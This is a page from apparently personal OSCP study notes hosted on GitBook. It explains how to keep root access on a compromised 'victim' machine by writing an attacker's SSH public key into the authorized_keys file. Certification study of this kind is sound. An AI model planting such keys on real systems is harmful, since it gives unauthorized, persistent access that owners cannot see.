OffSec Notes
CtrlK
All Gitbook
OSCP
OSCP
  • General
    • Common Operations (tty, SSH, rbash)
      • Linux commands
      • File transfer
      • run powershell
    • Post-exploit check
    • Privesc
      • Linux
      • Windows
        • UAC eventvwr
    • Metasploit
    • Python
  • Reconnaissance
    • DNS 53
    • Nmap / Masscan / Autorecon
    • Searchsploit
    • Services
      • SMTP 25
      • SMB 139, 445
      • MSSQL 1433
      • MYSQL 3306
      • TFTP UDP 69
    • Target Host Enumeration
  • Common Attack
    • Buffer Overflow
    • MS Office
  • Web Attack
    • Web Enumeration
    • Webshell to stable shell
      • WordPress
    • SQL Injections & Enum
  • Password Attack
    • Bruteforce
    • Hash Crack
    • Custom Wordlist
    • SSH Authorized_key reuse
      • persisting ssh login with ssh-keygen
  • AD Attack
    • Enumeration
      • Flow
    • Ticket manipulations mimi
      • Silver / Golden
    • DCOM P.664 / AD DCOM .one
    • Password hash dump and reuse
    • Impersonating token & pivot
      • Persisting access with DC admin
    • Tunneling / (with SSH key)
Powered by GitBook
On this page
  1. Password Attack
  2. SSH Authorized_key reuse

persisting ssh login with ssh-keygen

with root access, we can create authorized_keys file on victim /root/.ssh for persisting root access from kali

kali:
ssh-keygen
cat ~/.ssh/id_rsa.pub

victim:
(mkdir /user/.ssh)
echo "{id_rsa.pub}" > /user/.ssh/authorized_keys

ssh user@victim

(user <-> root)

windows (admin ps, need know password)

LogoKey-based authentication in OpenSSH for Windowsdocsmsft
PreviousSSH Authorized_key reuseNextEnumeration

Last updated 2 years ago